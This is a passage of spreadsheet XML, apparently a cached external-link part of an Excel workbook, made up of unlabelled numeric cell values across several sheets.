            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>35.6430555555556</v>
          </cell>
          <cell r="V104">
            <v>62.2231879039704</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.3659048938135</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>11.83</v>
          </cell>
          <cell r="R107">
            <v>266.11</v>
          </cell>
          <cell r="S107">
            <v>2751.53999999999</v>
          </cell>
          <cell r="T107">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U107">
            <v>41.0663580246914</v>
          </cell>
          <cell r="V107">
            <v>31.7583102493074</v>
          </cell>
          <cell r="W107">
            <v>122.062552831784</v>
          </cell>
          <cell r="X107">
            <v>126.601781218293</v>
          </cell>
          <cell r="Y107">
            <v>131.415861662924</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>1.83</v>
          </cell>
          <cell r="R108">
            <v>280.38</v>
          </cell>
          <cell r="S108">
            <v>2477.23</v>
          </cell>
          <cell r="T108">
            <v>7.625</v>
          </cell>
          <cell r="U108">
            <v>43.2685185185185</v>
          </cell>
          <cell r="V108">
            <v>28.5922206832871</v>
          </cell>
          <cell r="W108">
            <v>117.486338797814</v>
          </cell>
          <cell r="X108">
            <v>133.023040159783</v>
          </cell>
          <cell r="Y108">
            <v>128.057951825224</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>9.67</v>
          </cell>
          <cell r="R109">
            <v>235.57</v>
          </cell>
          <cell r="S109">
            <v>3031.15999999999</v>
          </cell>
          <cell r="T109">
            <v>40.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>36.3533950617284</v>
          </cell>
          <cell r="V109">
            <v>34.9856879039704</v>
          </cell>
          <cell r="W109">
            <v>234.953464322647</v>
          </cell>
          <cell r="X109">
            <v>265.848792291039</v>
          </cell>
          <cell r="Y109">
            <v>270.888372768182</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>8</v>
          </cell>
          <cell r="R110">
            <v>240.9</v>
          </cell>
          <cell r="S110">
            <v>3004.96</v>
          </cell>
          <cell r="T110">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U110">
            <v>37.1759259259259</v>
          </cell>
          <cell r="V110">
            <v>34.6832871652816</v>
          </cell>
          <cell r="W110">
            <v>252.125</v>
          </cell>
          <cell r="X110">
            <v>249.875466998755</v>
          </cell>
          <cell r="Y110">
            <v>267.3296815931</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">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6466.42</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>64308.542</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5729</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7245.34</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>58298.06</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>155</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>326.68</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>6626.36</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2951</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4033.14</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>36967.89</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1051.74</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>12060.65</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>2623</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1833.78</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>2643.16</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>276.06</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>249</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1386.046</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1995.42</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>34.3700892857143</v>
          </cell>
          <cell r="V101">
            <v>62.3191298342541</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>32.7486072744015</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>34.3700892857143</v>
          </cell>
          <cell r="V104">
            <v>62.0513006445672</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.2764963167588</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10</v>
          </cell>
          <cell r="R107">
            <v>276.11</v>
          </cell>
          <cell r="S107">
            <v>2761.53999999999</v>
          </cell>
          <cell r="T107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U107">
            <v>41.0877976190476</v>
          </cell>
          <cell r="V107">
            <v>31.7856813996316</v>
          </cell>
          <cell r="W107">
            <v>119.7</v>
          </cell>
          <cell r="X107">
            <v>126.351816305096</v>
          </cell>
          <cell r="Y107">
            <v>131.37343656076</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>10.92</v>
          </cell>
          <cell r="R108">
            <v>291.3</v>
          </cell>
          <cell r="S108">
            <v>2488.15</v>
          </cell>
          <cell r="T108">
            <v>45.5</v>
          </cell>
          <cell r="U108">
            <v>43.3482142857143</v>
          </cell>
          <cell r="V108">
            <v>28.6389272559852</v>
          </cell>
          <cell r="W108">
            <v>130.586080586081</v>
          </cell>
          <cell r="X108">
            <v>132.931685547545</v>
          </cell>
          <cell r="Y108">
            <v>128.069047284127</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.67</v>
          </cell>
          <cell r="R109">
            <v>247.24</v>
          </cell>
          <cell r="S109">
            <v>3042.82999999999</v>
          </cell>
          <cell r="T109">
            <v>48.625</v>
          </cell>
          <cell r="U109">
            <v>36.7916666666667</v>
          </cell>
          <cell r="V109">
            <v>35.0233655616942</v>
          </cell>
          <cell r="W109">
            <v>235.98971722365</v>
          </cell>
          <cell r="X109">
            <v>264.439411098528</v>
          </cell>
          <cell r="Y109">
            <v>270.754527857291</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>1.83</v>
          </cell>
          <cell r="R110">
            <v>242.73</v>
          </cell>
          <cell r="S110">
            <v>3006.79</v>
          </cell>
          <cell r="T110">
            <v>7.625</v>
          </cell>
          <cell r="U110">
            <v>36.1205357142857</v>
          </cell>
          <cell r="V110">
            <v>34.6085405156537</v>
          </cell>
          <cell r="W110">
            <v>192.349726775956</v>
          </cell>
          <cell r="X110">
            <v>249.441766571911</v>
          </cell>
          <cell r="Y110">
            <v>267.284047106715</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31">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7094.18</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>57214.362</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6981</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8723.64</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>56555.42</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>1896</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>353.54</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>8168.82</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4060</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4407.72</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>36620.17</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>126</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>2042.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>10144.15</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>899</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1919.88</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>1622.28</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>406.56</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>301</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1491.606</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1433.18</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>33.1849137931034</v>
          </cell>
          <cell r="V101">
            <v>62.1474517906336</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>32.6583907254362</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>33.1849137931034</v>
          </cell>
          <cell r="V104">
            <v>61.8803604224059</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.187580348944</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>1.17</v>
          </cell>
          <cell r="R107">
            <v>277.28</v>
          </cell>
          <cell r="S107">
            <v>2762.71</v>
          </cell>
          <cell r="T107">
            <v>4.875</v>
          </cell>
          <cell r="U107">
            <v>39.8390804597701</v>
          </cell>
          <cell r="V107">
            <v>31.7115472910927</v>
          </cell>
          <cell r="W107">
            <v>107.692307692308</v>
          </cell>
          <cell r="X107">
            <v>126.2730813618</v>
          </cell>
          <cell r="Y107">
            <v>131.363407668558</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>24</v>
          </cell>
          <cell r="R108">
            <v>315.3</v>
          </cell>
          <cell r="S108">
            <v>2512.15</v>
          </cell>
          <cell r="T108">
            <v>100</v>
          </cell>
          <cell r="U108">
            <v>45.301724137931</v>
          </cell>
          <cell r="V108">
            <v>28.8355142332415</v>
          </cell>
          <cell r="W108">
            <v>126.25</v>
          </cell>
          <cell r="X108">
            <v>132.423089121472</v>
          </cell>
          <cell r="Y108">
            <v>128.051668889199</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>8</v>
          </cell>
          <cell r="R109">
            <v>255.24</v>
          </cell>
          <cell r="S109">
            <v>3050.82999999999</v>
          </cell>
          <cell r="T109">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U109">
            <v>36.6724137931034</v>
          </cell>
          <cell r="V109">
            <v>35.0187098255279</v>
          </cell>
          <cell r="W109">
            <v>241.125</v>
          </cell>
          <cell r="X109">
            <v>263.708666353236</v>
          </cell>
          <cell r="Y109">
            <v>270.676832206318</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>10.67</v>
          </cell>
          <cell r="R110">
            <v>253.4</v>
          </cell>
          <cell r="S110">
            <v>3017.46</v>
          </cell>
          <cell r="T110">
            <v>44.4583333333333</v>
          </cell>
          <cell r="U110">
            <v>36.4080459770115</v>
          </cell>
          <cell r="V110">
            <v>34.6356749311294</v>
          </cell>
          <cell r="W110">
            <v>177.694470477976</v>
          </cell>
          <cell r="X110">
            <v>246.420678768745</v>
          </cell>
          <cell r="Y110">
            <v>266.9672506015</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="32">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6712.07</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>50502.292</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5172</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8594.3</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>53133.12</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>1322</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>528.08</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>8962.74</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4574.42</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32045.75</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>876</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1546.28</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>9473.87</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>2974</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1945.52</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>2650.76</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>721.4</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>235</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1978.006</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2649.07</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>0</v>
          </cell>
          <cell r="R101">
            <v>230.967</v>
          </cell>
          <cell r="S101">
            <v>5414.286</v>
          </cell>
          <cell r="T101">
            <v>0</v>
          </cell>
          <cell r="U101">
            <v>32.07875</v>
          </cell>
          <cell r="V101">
            <v>61.976717032967</v>
          </cell>
          <cell r="W101">
            <v>0</v>
          </cell>
          <cell r="X101">
            <v>271.294167565063</v>
          </cell>
          <cell r="Y101">
            <v>260.421411059556</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>32.5686698717949</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>0</v>
          </cell>
          <cell r="R104">
            <v>230.967</v>
          </cell>
          <cell r="S104">
            <v>5391.017</v>
          </cell>
          <cell r="T104">
            <v>0</v>
          </cell>
          <cell r="U104">
            <v>32.07875</v>
          </cell>
          <cell r="V104">
            <v>61.7103594322344</v>
          </cell>
          <cell r="W104">
            <v>0</v>
          </cell>
          <cell r="X104">
            <v>28.3179061602293</v>
          </cell>
          <cell r="Y104">
            <v>26.0491177026315</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>32.0991529304029</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>8</v>
          </cell>
          <cell r="R107">
            <v>285.28</v>
          </cell>
          <cell r="S107">
            <v>2770.71</v>
          </cell>
          <cell r="T107">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U107">
            <v>39.6222222222222</v>
          </cell>
          <cell r="V107">
            <v>31.7160027472527</v>
          </cell>
          <cell r="W107">
            <v>109.5</v>
          </cell>
          <cell r="X107">
            <v>125.802720134605</v>
          </cell>
          <cell r="Y107">
            <v>131.300280433535</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.33</v>
          </cell>
          <cell r="R108">
            <v>326.63</v>
          </cell>
          <cell r="S108">
            <v>2523.48</v>
          </cell>
          <cell r="T108">
            <v>47.2083333333333</v>
          </cell>
          <cell r="U108">
            <v>45.3652777777778</v>
          </cell>
          <cell r="V108">
            <v>28.885989010989</v>
          </cell>
          <cell r="W108">
            <v>93.5569285083848</v>
          </cell>
          <cell r="X108">
            <v>131.074916572268</v>
          </cell>
          <cell r="Y108">
            <v>127.896793317165</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>8</v>
          </cell>
          <cell r="R109">
            <v>263.24</v>
          </cell>
          <cell r="S109">
            <v>3058.82999999999</v>
          </cell>
          <cell r="T109">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U109">
            <v>36.5611111111111</v>
          </cell>
          <cell r="V109">
            <v>35.0140796703296</v>
          </cell>
          <cell r="W109">
            <v>239.25</v>
          </cell>
          <cell r="X109">
            <v>262.965354809299</v>
          </cell>
          <cell r="Y109">
            <v>270.594639126725</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>8</v>
          </cell>
          <cell r="R110">
            <v>261.4</v>
          </cell>
          <cell r="S110">
            <v>3025.46</v>
          </cell>
          <cell r="T110">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U110">
            <v>36.3055555555556</v>
          </cell>
          <cell r="V110">
            <v>34.632097069597</v>
          </cell>
          <cell r="W110">
            <v>165.25</v>
          </cell>
          <cell r="X110">
            <v>243.93649579189</v>
          </cell>
          <cell r="Y110">
            <v>266.698287202608</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="33">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
          <cell r="W8">
            <v>0</v>
          </cell>
          <cell r="X8">
            <v>0</v>
          </cell>
        </row>
        <row r="9">
          <cell r="V9">
            <v>0</v>
          </cell>
          <cell r="W9">
            <v>0</v>
          </cell>
          <cell r="X9">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>7357.671</v>
          </cell>
        </row>
        <row r="11">
          <cell r="V11">
            <v>0</v>
          </cell>
          <cell r="W11">
            <v>7808</v>
          </cell>
          <cell r="X11">
            <v>178217</v>
          </cell>
        </row>
        <row r="12">
          <cell r="V12">
            <v>0</v>
          </cell>
          <cell r="W12">
            <v>0</v>
          </cell>
          <cell r="X12">
            <v>86544</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>4964.85</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>45537.442</v>
          </cell>
        </row>
        <row r="18">
          <cell r="E18">
            <v>0</v>
          </cell>
          <cell r="F18">
            <v>62660</v>
          </cell>
          <cell r="G18">
            <v>1409996</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>8980.837</v>
          </cell>
        </row>
        <row r="19">
          <cell r="E19">
            <v>0</v>
          </cell>
          <cell r="F19">
            <v>0</v>
          </cell>
          <cell r="G19">
            <v>683645</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>36556.605</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>4132</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7369.98</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>49895.14</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>281.96</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>8680.78</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>1877</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4422.18</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>29500.57</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>99</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1009.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>8563.37</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
